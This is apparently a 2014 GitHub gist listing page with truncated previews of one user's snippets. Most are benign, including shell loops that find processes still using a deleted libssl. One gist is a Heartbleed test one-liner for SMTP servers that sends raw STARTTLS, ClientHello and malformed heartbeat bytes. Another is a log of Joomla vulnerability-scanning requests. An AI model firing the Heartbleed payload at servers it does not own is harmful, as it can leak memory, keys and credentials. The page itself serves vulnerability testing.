Skip to content

Instantly share code, notes, and snippets.

View thejh's full-sized avatar

Jann thejh

262 followers · 8 following
View GitHub Profile
@thejh
thejh / gist:10071485
Created April 7, 2014 23:02
root@thejh:/home/jann# for pid in $(grep -F '/usr/lib/x86_64-linux-gnu/libssl.so.1.0.0 (deleted)' /proc/*/maps | cut -d/ -f3 | sort -u); do cat /proc/$pid/cmdline | tr '\0' ' '; echo; done
/usr/lib/erlang/erts-5.9.1/bin/beam -Bd -K true -A 4 -- -root /usr/lib/erlang -progname erl -- -home /var/lib/couchdb -- -noshell -noinput -os_mon start_memsup false start_cpu_sup false disk_space_check_interval 1 disk_almost_full_threshold 1 -sasl errlog_type error -couch_ini /etc/couchdb/default.ini /etc/couchdb/local.ini /etc/couchdb/default.ini /etc/couchdb/local.ini -s couch -pidfile /var/run/couchdb/couchdb.pid -heart
/usr/bin/couchjs /usr/share/couchdb/server/main.js
/usr/bin/couchjs /usr/share/couchdb/server/main.js
/usr/bin/stunnel4 /etc/stunnel/stunnel.conf
/usr/bin/stunnel4 /etc/stunnel/stunnel.conf
/usr/bin/stunnel4 /etc/stunnel/stunnel.conf
/usr/bin/stunnel4 /etc/stunnel/stunnel.conf
/usr/bin/stunnel4 /etc/stunnel/stunnel.conf
/usr/bin/stunnel4 /etc/stunnel/stunnel.conf
@thejh
thejh / gist:10150152
Created April 8, 2014 16:16
for pid in $(grep '/usr/lib/.*libssl.* (deleted)' /proc/*/maps | cut -d/ -f3 | sort -u); do cat /proc/$pid/cmdline | tr '\0' ' '; echo; done
@thejh
thejh / gist:10158130
Created April 8, 2014 17:16
heartbleed test for SMTP servers
(echo -ne 'EHLO example.org\r\nSTARTTLS\r\n'; sleep 5; echo -ne '\x16\x03\x02\x00\xdc\x01\x00\x00\xd8\x03\x02\x53\x43\x5b\x90\x9d\x9b\x72\x0b\xbc\x0c\xbc\x2b\x92\xa8\x48\x97\xcf\xbd\x39\x04\xcc\x16\x0a\x85\x03\x90\x9f\x77\x04\x33\xd4\xde\x00\x00\x66\xc0\x14\xc0\x0a\xc0\x22\xc0\x21\x00\x39\x00\x38\x00\x88\x00\x87\xc0\x0f\xc0\x05\x00\x35\x00\x84\xc0\x12\xc0\x08\xc0\x1c\xc0\x1b\x00\x16\x00\x13\xc0\x0d\xc0\x03\x00\x0a\xc0\x13\xc0\x09\xc0\x1f\xc0\x1e\x00\x33\x00\x32\x00\x9a\x00\x99\x00\x45\x00\x44\xc0\x0e\xc0\x04\x00\x2f\x00\x96\x00\x41\xc0\x11\xc0\x07\xc0\x0c\xc0\x02\x00\x05\x00\x04\x00\x15\x00\x12\x00\x09\x00\x14\x00\x11\x00\x08\x00\x06\x00\x03\x00\xff\x01\x00\x00\x49\x00\x0b\x00\x04\x03\x00\x01\x02\x00\x0a\x00\x34\x00\x32\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10\x00\x11\x00\x23\x00\x00\x00\x0f\x00\x01\x01'; sleep 5; echo -ne '\x18\x03\x02\x00\x03\x01\x40\x00'; sl
@thejh
thejh / zombies.c
Created May 19, 2014 00:36
#define _GNU_SOURCE
#include <jh.h>
#include <stdio.h>
#include <math.h>
#include <string.h>
#include <stdlib.h>
#include <stdarg.h>
#define RIFLE_SPEED 975
@thejh
thejh / gist:703e89ceda033b72774c
Created May 30, 2014 17:21
31.148.220.60 thejh.net - [29/May/2014:05:32:33 +0200] "GET /administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a HTTP/1.1" 404 345 "-" "Mozilla/5.0"
31.148.220.60 thejh.net - [29/May/2014:05:32:33 +0200] "GET /components/com_community/index.html HTTP/1.1" 404 345 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)"
31.148.220.60 thejh.net - [29/May/2014:05:32:33 +0200] "GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload HTTP/1.1" 404 345 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)"
31.148.220.60 thejh.net - [29/May/2014:05:32:33 +0200] "GET /index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author= HTTP/1.1" 404 345 "-" "curl/7.21.6 (i686-pc-linux-gnu) libcurl/7.21.6 OpenSSL/1.0.0e zlib/1.2.3.4 libidn/1.22 librtmp/2.3"
31.148.220.60 thejh.net - [29/May/2014:05:32:33 +0200] "GET /club/components/com_jnews/includes/openflashchar
@thejh
thejh / test2
Created June 19, 2014 00:03
test2
test2
@thejh
thejh / keybase.md
Created July 18, 2014 14:02
keybase.md

Keybase proof

I hereby claim:

  • I am thejh on github.
  • I am thejh (https://keybase.io/thejh) on keybase.
  • I have a public key whose fingerprint is 2819 89A9 E4D2 D5E1 7D1F 3F0F 3E0A 3452 4E78 23A8

To claim this, I am signing this object:

@thejh
thejh / first_file
Created August 18, 2014 18:37
<?xml version="1.0" encoding="utf-8"?>
<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="application/vnd.ms-powerpoint.presentation.macroenabled.12">
<!--Created automatically by update-mime-database. DO NOT EDIT!-->
<comment>Microsoft PowerPoint Presentation</comment>
<comment xml:lang="af">Microsoft PowerPoint-voorlegging</comment>
<comment xml:lang="ar">عرض مايكروسوفت باوربوينت تقديمي</comment>
<comment xml:lang="as">Microsoft PowerPoint পৰিৱেশন</comment>
<comment xml:lang="ast">Presentación de Microsoft PowerPoint</comment>
<comment xml:lang="be">Microsoft PowerPoint Presentation</comment>
<comment xml:lang="bg">Microsoft PowerPoint - презентация</comment>
@thejh
thejh / gmpfactor.c
Created October 8, 2014 09:01
#include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <gmp.h>
#include <signal.h>
#include <time.h>
//f(x)=13231/x
//f'(x)=-13231/(x^2)
//g'(x)=f'(x)+1=1-13231/(x^2)
@thejh
thejh / commandlines.c
Last active August 29, 2015 14:09
commandlines
/* 2014: modified for colors by Jann Horn */
/* exec-notify, so you can watch your acrobat reader or vim executing "bash -c"
* commands ;-)
* Requires some 2.6.x Linux kernel with proc connector enabled.
*
* $ cc -Wall -ansi -pedantic -std=c99 exec-notify.c
*
* (C) 2007-2010 Sebastian Krahmer <krahmer@suse.de> original netlink handling
* stolen from an proc-connector example, copyright folows:
*/